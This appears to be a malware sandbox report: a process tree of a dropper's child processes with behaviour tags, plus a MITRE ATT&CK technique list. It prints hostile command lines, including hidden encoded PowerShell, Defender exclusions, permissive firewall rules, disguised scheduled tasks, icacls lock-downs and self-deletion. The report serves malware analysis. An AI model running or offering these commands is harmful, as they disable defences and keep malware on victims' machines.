- Loads dropped DLL
PID:1672

C:\Users\Admin\AppData\Local\Temp\is-RBE1A.tmp\Sayma.exe
"C:\Users\Admin\AppData\Local\Temp\is-RBE1A.tmp\Sayma.exe" /S /UID=burnerch2
7⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Modifies system certificate store
PID:2172

C:\Program Files\Internet Explorer\YINOSNAJGX\ultramediaburner.exe
"C:\Program Files\Internet Explorer\YINOSNAJGX\ultramediaburner.exe" /VERYSILENT
8⤵
- Executes dropped EXE
PID:1872

C:\Users\Admin\AppData\Local\Temp\is-L5URV.tmp\ultramediaburner.tmp
"C:\Users\Admin\AppData\Local\Temp\is-L5URV.tmp\ultramediaburner.tmp" /SL5="$401E6,281924,62464,C:\Program Files\Internet Explorer\YINOSNAJGX\ultramediaburner.exe" /VERYSILENT
9⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:3020

C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
10⤵
- Executes dropped EXE
PID:3140

C:\Users\Admin\AppData\Local\Temp\76-54dca-6d7-44394-eb49ac0674ae8\Losizhyhupi.exe
"C:\Users\Admin\AppData\Local\Temp\76-54dca-6d7-44394-eb49ac0674ae8\Losizhyhupi.exe"
8⤵
- Executes dropped EXE
PID:2700

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
9⤵
- Modifies Internet Explorer settings
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:3264

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3264 CREDAT:275457 /prefetch:2
10⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:3832

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3264 CREDAT:930828 /prefetch:2
10⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2908

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3264 CREDAT:865313 /prefetch:2
10⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:4916

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3264 CREDAT:537631 /prefetch:2
10⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:4812

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
9⤵
PID:2100

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?zoneid=1851483
9⤵
PID:2164

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?zoneid=1851513
9⤵
PID:1452

C:\Users\Admin\AppData\Local\Temp\69-1e681-c3c-218a0-085a20d2d00ec\Caledejaqy.exe
"C:\Users\Admin\AppData\Local\Temp\69-1e681-c3c-218a0-085a20d2d00ec\Caledejaqy.exe"
8⤵
- Executes dropped EXE
PID:2464

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bl03xcip.s3a\any.exe & exit
9⤵
PID:4028

C:\Users\Admin\AppData\Local\Temp\bl03xcip.s3a\any.exe
C:\Users\Admin\AppData\Local\Temp\bl03xcip.s3a\any.exe
10⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2420

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fj2tey5u.c4l\installer.exe /qn CAMPAIGN=654 & exit
9⤵
PID:4948

C:\Users\Admin\AppData\Local\Temp\fj2tey5u.c4l\installer.exe
C:\Users\Admin\AppData\Local\Temp\fj2tey5u.c4l\installer.exe /qn CAMPAIGN=654
10⤵
- Enumerates connected drives
- Modifies system certificate store
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of FindShellTrayWindow
PID:5052

C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\fj2tey5u.c4l\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\fj2tey5u.c4l\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1633365286 /qn CAMPAIGN=654 " CAMPAIGN="654"
11⤵
PID:4892

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri10acd1e0a9e6.exe /mixone
4⤵
- Loads dropped DLL
PID:768

C:\Users\Admin\AppData\Local\Temp\7zSC54FE7C2\Fri10acd1e0a9e6.exe
Fri10acd1e0a9e6.exe /mixone
5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:564

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "Fri10acd1e0a9e6.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zSC54FE7C2\Fri10acd1e0a9e6.exe" & exit
6⤵
PID:2564

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "Fri10acd1e0a9e6.exe" /f
7⤵
- Kills process with taskkill
PID:3040

C:\Windows\system32\taskeng.exe
taskeng.exe {F439DF94-6A43-4146-812A-6A393C23DB1A} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]
1⤵
PID:3508

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
2⤵
PID:3692

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:468

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
3⤵
- Executes dropped EXE
PID:4136

C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
4⤵
- Creates scheduled task(s)
PID:4236

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
2⤵
- Suspicious use of SetThreadContext
PID:4644

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
3⤵
PID:4772

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
2⤵
- Suspicious use of SetThreadContext
PID:4012

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
3⤵
PID:3496

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
2⤵
- Suspicious use of SetThreadContext
PID:4632

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
3⤵
PID:4860

C:\Program Files\Mozilla Firefox\default-browser-agent.exe
"C:\Program Files\Mozilla Firefox\default-browser-agent.exe" do-task
2⤵
PID:4568

C:\Users\Admin\AppData\Roaming\fscgbhc
C:\Users\Admin\AppData\Roaming\fscgbhc
2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:4496

C:\Users\Admin\AppData\Local\b0eea5d3-26b2-4d14-8f03-49965ac14e0b\9DC4.exe
C:\Users\Admin\AppData\Local\b0eea5d3-26b2-4d14-8f03-49965ac14e0b\9DC4.exe --Task
2⤵
- Suspicious use of SetThreadContext
PID:1984

C:\Users\Admin\AppData\Local\b0eea5d3-26b2-4d14-8f03-49965ac14e0b\9DC4.exe
C:\Users\Admin\AppData\Local\b0eea5d3-26b2-4d14-8f03-49965ac14e0b\9DC4.exe --Task
3⤵
PID:1968

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-85731490628417890-645160815-2033713046-1182084052-590069270-1229800579-315626950"
1⤵
PID:3368

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "788227152715672349685432795-959364922-99395053422712946920795194051203592895"
1⤵
PID:2956

C:\Users\Admin\AppData\Local\Temp\9DC4.exe
C:\Users\Admin\AppData\Local\Temp\9DC4.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3356

C:\Users\Admin\AppData\Local\Temp\9DC4.exe
C:\Users\Admin\AppData\Local\Temp\9DC4.exe
2⤵
- Executes dropped EXE
- Adds Run key to start application
PID:1620

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\b0eea5d3-26b2-4d14-8f03-49965ac14e0b" /deny *S-1-1-0:(OI)(CI)(DE,DC)
3⤵
- Modifies file permissions
PID:2908

C:\Users\Admin\AppData\Local\Temp\9DC4.exe
"C:\Users\Admin\AppData\Local\Temp\9DC4.exe" --Admin IsNotAutoStart IsNotTask
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3868

C:\Users\Admin\AppData\Local\Temp\9DC4.exe
"C:\Users\Admin\AppData\Local\Temp\9DC4.exe" --Admin IsNotAutoStart IsNotTask
4⤵
- Executes dropped EXE
- Modifies extensions of user files
PID:2768

C:\Users\Admin\AppData\Local\92afbd5f-c3cf-47b0-a2cc-cc62305a2c8a\build2.exe
"C:\Users\Admin\AppData\Local\92afbd5f-c3cf-47b0-a2cc-cc62305a2c8a\build2.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3660

C:\Users\Admin\AppData\Local\92afbd5f-c3cf-47b0-a2cc-cc62305a2c8a\build2.exe
"C:\Users\Admin\AppData\Local\92afbd5f-c3cf-47b0-a2cc-cc62305a2c8a\build2.exe"
6⤵
- Executes dropped EXE
PID:768

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 768 -s 868
7⤵
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
PID:4388

C:\Users\Admin\AppData\Local\92afbd5f-c3cf-47b0-a2cc-cc62305a2c8a\build3.exe
"C:\Users\Admin\AppData\Local\92afbd5f-c3cf-47b0-a2cc-cc62305a2c8a\build3.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1724

C:\Users\Admin\AppData\Local\92afbd5f-c3cf-47b0-a2cc-cc62305a2c8a\build3.exe
"C:\Users\Admin\AppData\Local\92afbd5f-c3cf-47b0-a2cc-cc62305a2c8a\build3.exe"
6⤵
- Executes dropped EXE
PID:3952

C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
7⤵
- Creates scheduled task(s)
PID:468

C:\Users\Admin\AppData\Local\Temp\2A6A.exe
C:\Users\Admin\AppData\Local\Temp\2A6A.exe
1⤵
- Executes dropped EXE
PID:3964

C:\Users\Admin\AppData\Local\Temp\72A1.exe
C:\Users\Admin\AppData\Local\Temp\72A1.exe
1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3432

C:\Users\Admin\AppData\Local\Temp\2879.exe
C:\Users\Admin\AppData\Local\Temp\2879.exe
1⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
PID:4592

C:\Windows\system32\taskeng.exe
taskeng.exe {EDB8F8C8-4130-432E-A58F-EA2ADC2C552B} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:4400

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
PID:4740

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 81B1F38134CEB2D91799F8DCE1A41559 C
2⤵
PID:4784

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 81A8F4DF8D03F9B689513C46864288A3
2⤵
- Blocklisted process makes network request
PID:4808

C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
3⤵
- Kills process with taskkill
PID:4512

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding F5124FBBD0C19CD9E91241B70E00C22B M Global\MSI0000
2⤵
PID:4956

C:\Users\Admin\AppData\Local\Temp\B751.exe
C:\Users\Admin\AppData\Local\Temp\B751.exe
1⤵
PID:3568

C:\Users\Admin\AppData\Local\Temp\D666.exe
C:\Users\Admin\AppData\Local\Temp\D666.exe
1⤵
- Drops file in Windows directory
PID:1588

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
2⤵
PID:4228

C:\Windows\System32\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
2⤵
PID:4572

C:\Windows\system32\schtasks.exe
schtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM
2⤵
- Creates scheduled task(s)
PID:4372

C:\Windows\System32\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
2⤵
PID:2632

C:\Windows\System\svchost.exe
"C:\Windows\System\svchost.exe" formal
2⤵
- Drops file in Windows directory
PID:2168

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
3⤵
PID:4816

C:\Windows\System32\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
3⤵
PID:2676

C:\Windows\System32\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
3⤵
PID:3748

C:\Windows\system32\taskeng.exe
taskeng.exe {959D657A-3312-4C11-B39A-4E1B549C7B7A} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:4020

C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 115 -t 8080
2⤵
PID:5036

C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 113 -t 8080
2⤵
PID:4780

C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 114 -t 8080
2⤵
PID:4076

C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 111 -t 8080
2⤵
PID:4580

C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 112 -t 8080
2⤵
PID:5796

C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 110 -t 8080
2⤵
PID:6616

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Bootkit

T1067

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

Disabling Security Tools

T1089

Virtualization/Sandbox Evasion

T1497

File Permissions Modification

T1222

Install Root Certificate

T1130

Credential Access

Credentials in Files

T1081

Discovery

Software Discovery

T1518

Query Registry

Virtualization/Sandbox Evasion

T1497

System Information Discovery